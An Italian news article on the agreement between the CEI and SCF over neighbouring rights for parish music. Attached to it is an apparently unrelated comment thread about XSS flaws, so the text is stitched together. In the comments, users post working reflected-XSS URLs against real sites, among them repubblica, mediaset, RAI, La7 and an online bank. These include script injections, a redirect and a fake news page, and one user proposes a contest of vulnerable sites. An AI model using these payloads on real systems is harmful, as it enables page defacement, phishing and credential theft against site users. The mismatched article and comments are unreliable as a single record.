Musica legale per le parrocchie

La Conferenza Episcopale Italiana firma l'accordo con la Società Consortile Fonografica, che riscuote i diritti connessi, da pagare oltre al diritto d'autore


Roma – Con una certa enfasi la Società Consortile Fonografica (SCF) ha fatto sapere di aver stipulato un contratto con la Conferenza Episcopale Italiana (CEI) che consentirà alle 30mila parrocchie italiane di diffondere musica legalmente in pubblico.

Il valore del contratto è in sé irrisorio ma ciò che conta per SCF è il fatto che ancora una volta vengano “riconosciuti” i cosiddetti diritti connessi : secondo la legge sul diritto d’autore, afferma infatti SCF, “per diffondere legittimamente musica registrata in pubblico, anche senza scopo di lucro, occorre infatti ottenere l’autorizzazione da tutte le parti che contribuiscono alla creazione del prodotto musicale, quindi gli autori, gli artisti interpreti ed esecutori e i produttori fonografici, in Italia rappresentati per la maggior parte da SCF. Per la diffusione in pubblico di musica registrata è necessario quindi regolarizzare la propria posizione non solo con la SIAE, per i diritti d’autore, ma anche con SCF per quanto riguarda i diritti connessi”.

La questione dei diritti connessi è giunta in passato alla ribalta delle cronache dopo che la stessa SCF aveva denunciato MTV perché a suo dire non corrispondeva i diritti nella loro totalità. In indagini che risalgono al 2003 sulle emittenti radiofoniche, la Guardia di Finanza avvalendosi della consulenza della SCF, aveva rilevato come il mancato pagamento di questi diritti è cosa diffusa . Da qui l’importanza per SCF del contratto con la CEI, destinato in qualche modo a “fare scuola”.

Rimane invece aperta la questione scaturita da una denuncia contro la SCF e una serie di altri enti, SIAE compresa, da parte delle Radiotelevisioni Europee Associate (REA) che lo scorso giugno hanno agito parlando di un “imbroglio dei diritti connessi”. Secondo REA, a rivendicare i diritti connessi anche attraverso SCF sono società italiane e straniere che producono, o meglio stampano, dischi in vinile e compact disk di opere musicali e video. “È un’attività industriale – aveva affermato la REA – che nulla ha a che fare con le opere dell’ingegno e dell’arte prodotte dagli autori e promosse dagli editori”. Secondo le radiotelevisioni associate, quello preteso da SCF è un “obolo perpetuo” che “andrebbe abrogato per scongiurare la paralisi totale della distribuzione dei prodotti audiovisivi e fonografici, per non vedere compromessa la diffusione delle opere fonografiche e, soprattutto per non penalizzare il consumatore con dei costi parassitari”.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    C'era uno spiffero in paginebianche
    sembra abbioano risolto
    • Presid. Scrocco scrive:
      Io dico che c'è ancora...
      http://www.paginebianche.it/execute.cgi?btt=1&tl=2&tr=101&tc=&cb=&tq=2&qs=aa&qsn=&dv=%3Cbody+onLoad%3D%22document.write%28String.fromCharCode%280x003E%29%2B%27Tutti+al+party+nella+mia+Scrocco-villa%21%27%2B%27%3CIMG+SRC%3Dhttp%3A%2F%2Fpunto-informatico.it%2Fcommunity%2Favatar%2F2983.jpg%27%2BString.fromCharCode%280x003E%29%29%22+x&ind=&nc=&x=0&y=0 :o
      • Anonimo scrive:
        Re: Io dico che c'è ancora...
        - Scritto da: Presid. Scrocco

        http://www.paginebianche.it/execute.cgi?btt=1&tl=2

        :o Grandissimo :D
  • Presid. Scrocco scrive:
    Buco in www.repubblica.it
    E' ovvio che è acqua calda, i buchi ce li hanno tutti.Vedi repubblica:http://finanza.repubblica.it/scripts/cligipsw.dll?app=KWF&tpl=kwfinanza%5Csearch_result.tpl&crit=descr&op=at&ntit_cerca=300&cerca_non_scaduti=1&frase=%22%3E%3Cbody+onload%3D%22document.write%28%27%3CDIV+style%3D%5C%27top%3A0px%3Bleft%3A0px%3Bwidth%3A1000px%3Bheight%3A1000px%3B%5C%27%3ECiao+scrocco-amici%21%27%29%22&titmask_cerca=%2410000001 :D :D :D Mi merito una Perri-air....==================================Modificato dall'autore il 20/07/2005 10.56.07==================================Modificato dall'autore il 20/07/2005 11.34.51
    • Anonimo scrive:
      Re: Buco in www.repubblica.it
      Non fa
    • Presid. Scrocco scrive:
      Re: Buco in www.repubblica.it
      Pure le banche online... non ci si può fidare proprio di nessuno:http://iwbank.is-asp.com/Inserite nel form "
      (virgolette e maggiore) e poi i soliti tag script e un bell'alert("ciao")......Potremmo fare una listona di questi siti, una gara lamer.... :|
      • Anonimo scrive:
        Re: Buco in www.repubblica.it
        wow simpatica sta cosa
      • Anonimo scrive:
        Re: Buco in www.repubblica.it
        - Scritto da: Presid. Scrocco
        Pure le banche online... non ci si può fidare
        proprio di nessuno:

        http://iwbank.is-asp.com/

        Inserite nel form "
        (virgolette e maggiore) e
        poi i soliti tag script e un
        bell'alert("ciao")......

        Potremmo fare una listona di questi siti, una
        gara lamer.... :|http://iwbank.is-asp.com/it/suche/main.html?searchfor=%22%3E%3Cscript%3Ewindow.location=%22http://punto-informatico.it%22%3C/script%3Eaccorciato quihttp://snurl.com/gdku
    • Anonimo scrive:
      Re: Buco in www.repubblica.it
      Si possono fare cose simpatiche in effetti.#######disclaimer##################il link qui sotto porta ad una pagina creata ad arte, non e' una notizia vera, non rompetemi le scatole#################################http://finanza.repubblica.it/scripts/cligipsw.dll?app=KWF&tpl=kwfinanza%5Csearch_result.tpl&crit=descr&op=at&ntit_cerca=300&cerca_non_scaduti=1&frase=%22%3E%3Cdiv+style%3D%22width%3A1000px%3Bheight%3A800px%3Bposition%3Aabsolute%3Btop%3A100px%3Bleft%3A0px%3Bbackground-color%3Awhite%3Bz-index%3A0%22%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CB%3E%3Cfont%20size=+3%3EFinalmente%20questuomo%20e'%20....%3Cbr%3E%3Cbr%3E%3Cfont%20size=+1%3EEvviva!!!!!!!!!!!!!%3Cbr%3ECiao%20Puntoinformagico%20:p%3Cbr%3E%3Cbr%3E%3Cimg%20src=http://upload.wikimedia.org/wikipedia/en/0/08/SilvioB.jpg%3E%3CBR%3EAggiungete voi un aggettivo di vostro gradimento
      • Anonimo scrive:
        Re: Buco in www.repubblica.it
        - Scritto da: Anonimo
        Si possono fare cose simpatiche in effetti.

        #######disclaimer##################
        il link qui sotto porta ad una pagina creata ad
        arte, non e' una notizia vera, non rompetemi le
        scatole
        #################################

        http://finanza.repubblica.it/scripts/cligipsw.dll?

        Aggiungete voi un aggettivo di vostro gradimentourl incasinatissima, meglio cosi':http://poveril.notlong.com/
      • Anonimo scrive:
        Re: Buco in www.repubblica.it
        Quest'uomo è dio... io lo amo.
        • Anonimo scrive:
          Re: Buco in www.repubblica.it
          gia che ci siamohttp://servizi.mediaset.it/Contenuti/Ricerca/SearchResult.jsp?fromQuery=true&inputDirectory=&categoryName=&makeSearch=true&searchWord=%3Cscript%3Ealert('Gi%E0%20che%20ci%20siamo!')%3C/script%3E&searchWhere=Mondo
          • Presid. Scrocco scrive:
            Re: Buco in www.repubblica.it
            Per la par condicio:http://www.raiclick.it/raiclick_tv/search.jsp?words=%3Cscript%3Ealert%28%27Il+presidente+Scrocco+vi+saluta%21%27%29%3C%2Fscript%3E%3CIMG+SRC%3Dhttp%3A%2F%2Fpunto-informatico.it%2Fcommunity%2Favatar%2F2983.jpg%3E ;)==================================Modificato dall'autore il 20/07/2005 17.49.26
          • Anonimo scrive:
            Re: Buco in www.repubblica.it
            - Scritto da: Presid. Scrocco
            Per la par condicio:

            http://www.raiclick.it/raiclick_tv/search.jsp?wordhttp://www.raiclick.it/raiclick_tv/search.jsp?words=%3Cscript%3Edocument.write%28%27%3Cimg%20src=http://upload.wikimedia.org/wikipedia/it/0/08/SilvioB.jpg%3E%21%27%29%3C%2Fscript%3Eveditelo cosi' :)
          • Presid. Scrocco scrive:
            Re: Buco in www.repubblica.it
            E per finire anche LA7:http://www.la7.it/ricerca.jsp?testo=%3Cscript%3Ealert%28%27Il+presidente+Scrocco+vi+saluta+anche+da+qui%21%27%29%3C%2Fscript%3E%3CIMG+SRC%3Dhttp%3A%2F%2Fpunto-informatico.it%2Fcommunity%2Favatar%2F2983.jpg%3E :|
          • Anonimo scrive:
            Luttazzi su mediaset!
            - Scritto da: Anonimo
            gia che ci siamo

            http://servizi.mediaset.it/Contenuti/Ricerca/Searc####SATIRA#####Incredibile!Luttazzi torna su mediaset!http://servizi.mediaset.it/Contenuti/Ricerca/SearchResult.jsp?searchWord=%3Cscript%3Edocument.write('%3Cimg%20src=http://www.repubblica.it/online/spettacoli_e_cultura/luttazzi/luttazzi/esterne00331654cxw200h240c00.jpg%3E')%3C/script%3E####FINE SATIRA###
  • Anonimo scrive:
    Esperto ? A me sembra acqua calda !!!!
    Più che un esperto sembra solo il solito smanettone in cerca di pubblicità che cerca di propinare acqua calda ai meno informati.Infatti, quello di cui si parla nell'articolo è noto a chiunque si occupi di IT e non bisogna di certo esere esperti di sicurezza. Forse sarebbe meglio lasciare più spazio ai veri esperti. Sono stanco di leggere articoli scritti da periti industriali e ragionieri programmatori, voglio sentire pareri più autorevoli, magari provenienti dal mondo accademico o da quello della ricercaSalutiA.
    • Anonimo scrive:
      Re: Esperto ? A me sembra acqua calda !!
      Qualcosa contro i periti industriali? :@ :)Io credo che fino a quando esisteranno persone che vanno a selezionare un link solo perché c'é scritto "click me" anche una vulnerabilità di tipo XSS possa essere pericolosa..Se lavori nel settore informatico ed hai avuto la fortuna/sfortuna di dover dare assistenza a qualche cliente penso tu non possa che concordare.. ;)
    • Anonimo scrive:
      Re: Esperto ? A me sembra acqua calda !!
      - Scritto da: Anonimo
      Più che un esperto sembra solo il solito
      smanettone in cerca di pubblicità che cerca di
      propinare acqua calda ai meno informati.
      Infatti, quello di cui si parla nell'articolo è
      noto a chiunque si occupi di IT e non bisogna di
      certo esere esperti di sicurezza. E quindi?
      Forse sarebbe meglio lasciare più spazio ai veri
      esperti. Sono stanco di leggere articoli scritti
      da periti industriali e ragionieri programmatori,
      voglio sentire pareri più autorevoli, magari
      provenienti dal mondo accademico o da quello
      della ricercaE tu che ne sai da dove viene quel parere?
    • frog scrive:
      Re: Esperto ? A me sembra acqua calda !!
      - Scritto da: AnonimoCUT
      Sono stanco di leggere articoli scritti
      da periti industriali e ragionieri programmatori,
      voglio sentire pareri più autorevoli, magari
      provenienti dal mondo accademico o da quello
      della ricerca

      Saluti

      A.
      La rete e' grande abbastanza da fornirti cio' che cerchi.
    • Anonimo scrive:
      Re: Esperto ? A me sembra acqua calda !!
      - Scritto da: Anonimo
      Infatti, quello di cui si parla nell'articolo è
      noto a chiunque si occupi di IT e non bisogna di
      certo esere esperti di sicurezza. Scusa... se le falle, quando sono "triviali" per chi le conosce bene, non venissero mai segnalate proprio perche` presunte "acqua calda", non sarebbe peggio? Sara` acqua calda ma e` sfruttabile... al limite il titolo di banalone dovrebbe andare a chi ce l'ha messa l'acqua calda, non a chi l'ha "scoperta".
      Forse sarebbe meglio lasciare più spazio ai veri
      esperti. Sono stanco di leggere articoli scritti
      da periti industriali e ragionieri programmatori,
      voglio sentire pareri più autorevoli, magari
      provenienti dal mondo accademico o da quello
      della ricercaRicerca sull'informatica "pura", o informatica applicata alla ricerca? La prima dev'essere molto rara, la seconda usa gli strumenti informatici che gli capitano, basta che siano abbastanza affidabili (nell'uso normale, non nell'essere a prova di exploit) e che funzionino, e preferibilmente di altissimo livello sintattico (tipo toolkits "punta e clicca per aggiungere il bottone"). Hanno altro da fare che perdere tempo col programmare e/o cercare le fallettine foss'anche nei loro "softwares" (virgolette obbligatorie)... non sono mica esposti agli attacchi di qualche truffaldino.Io l'universita` purtroppo non l'ho finita (per rompimento di OO precoce) ma immagino ci siano anche diversi accademici qui intorno... magari, non e` detto che siano immediatamente riconoscibili: forse e` opportuno cercare fra quelli che si sono sorbiti tutta la zolfa universitaria per scoprire che oggi non c'e` mercato...
    • Anonimo scrive:
      Re: Esperto ? A me sembra acqua calda !!
      - Scritto da: Anonimo
      Più che un esperto sembra solo il solito
      smanettone in cerca di pubblicità che cerca di
      propinare acqua calda ai meno informati.Scusa un istante, ma tu giudichi la gravità della vulnerabilità in base a quanto è complicato poterla sfruttare?Questi buchi segnalati dal nostro amico qui sono grandi come case... uno potrebbe sostituirti l'intera pagina di una banca per rubarti login e password o cose simili. Ci sono un'infinità di siti vulnerabili, è bene che si indirizzi il problema e lo si corregga, non è certo nascondendo la testa sotto la sabbia o sotto la presunzione che si risolvono i problemi.Lo stesso vale per i bug (o le "features" come indicato da alcuni) segnalate da Aranzulla, seppur non siano bug sono comunque falle di sicurezza che vanno tappate al più presto... specie sui siti delle banche!!!!P.S.: A proposito di Aranzulla http://www.salvatore-aranzulla.com/2005/07/19/gdf-a-casa-mia/
      • Anonimo scrive:
        Re: Esperto ? A me sembra acqua calda !!

        Lo stesso vale per i bug (o le "features" come
        indicato da alcuni) segnalate da Aranzulla,
        seppur non siano bug sono comunque falle di
        sicurezza che vanno tappate al più presto...Calma, non facciamo confusione, quelle seganalte da Aranzulla (riguardo lo sppofing della status bar) era davvero acqua calda.Tanto è vero che nessun sito di sicurezza (Secunia, Securityfocuss etc..) ne parla.E poi diciamocela chiara la gente guarda sempre la barra degli indirizzi se proprio vuole assicurarsi che sti visitando il sito corretto.Se poi leggi ulteriori suoi articoli, del tipo che c'è una falla nel firewall di Windows che permette ad un utente con i privilegi di Amministratore di aprire porte o chiudere il firewall stesso, bhe da qui capisci che tipo è e il motivo perchè viene paraculato da tutti gli utenti internet italiani :DNon a caso gli hanno dedicato pure il sito parodia :)
        • Anonimo scrive:
          Re: Esperto ? A me sembra acqua calda !!
          - Scritto da: Anonimo
          Se poi leggi ulteriori suoi articoli, del tipo
          che c'è una falla nel firewall di Windows che
          permette ad un utente con i privilegi di
          Amministratore di aprire porte o chiudere il
          firewall stesso, bhe da qui capisci che tipo è e
          il motivo perchè viene paraculato da tutti gli
          utenti internet italiani :D

          Non a caso gli hanno dedicato pure il sito
          parodia :)Pero` c'e` il fattore eta`: Aranzulla e` piuttosto giovane.Criticarlo per eccesso di zelo lo vedo come uno sparare sulla croce rossa. Se d'altronde uno cerca di farsi apprezzare, e tutti gli altri lo smontano subito in quel modo, o ha una personalita` solida come la roccia o si deprimera` pensando che in effetti e` un fallito eccetera eccetera... un po' d'incoraggiamento non guasta, specie in Italia dove l'incoraggiamento in questo settore e` quasi nullo, con critiche che arrivano da pulpiti non molto piu` esperti della vittima (per forza di cose: non c'e` mercato, non c'e` interesse, non c'e` esperienza).
          • Anonimo scrive:
            Re: Esperto ? A me sembra acqua calda !!
            - Scritto da: Alex¸tg
            - Scritto da: Anonimo

            Se d'altronde uno
            cerca di farsi apprezzare, e tutti gli altri lo
            smontano subito in quel modo,Come se fosse obbligatorio cercare di farsi apprezzare.Sinceramente: che tu mi apprezzi o meno, me ne fotto.E credo che la cosa sia reciproca.Le persone che conosco mi apprezzano non per le st*onzate che scrivo in un blog (piattaforma malamente abusata da psico-onanisti) ma per quello che faccio e dico.
  • Anonimo scrive:
    Per chi è interessato...
    Hacking with JavaScripthttp://www.governmentsecurity.org/articles/HackingWithJavascript.php ;)
  • Anonimo scrive:
    io l'ho sempre detto..
    ..lo amo anche io questo ragazzo! non e' un aranzulla style! lui si che r0x un t0t 'ngopp u pc!
  • Anonimo scrive:
    Leonardo.it chiiiii?
    Mah!
    • Anonimo scrive:
      Re: Leonardo.it chiiiii?
      ???
      • Presid. Scrocco scrive:
        Re: Leonardo.it chiiiii?
        Non lo conosco manco io..... ho preso un sito a caso per far vedere che tutti hanno questa vulnerabilità, ma in quanto a popolarità non credo siano molto conosciuti... :D :D :D
        • Anonimo scrive:
          Re: Leonardo.it chiiiii?
          Potevi citare HTML.it allora!http://cerca.html.it/cgi-bin/cerca.cgi?q=%3Cscript%3Ealert('test')%3C/script%3E&gr=off&ul=:)
    • Anonimo scrive:
      Re: Leonardo.it chiiiii?
      - Scritto da: Anonimo
      Mah!Infatti il "POPOLARE" Leonardo.it ... ma de che !!!!Al limite Filmup.com che è stato inglobato da 'sto Leonardo è un pò piu famoso ...ennamo no!
Chiudi i commenti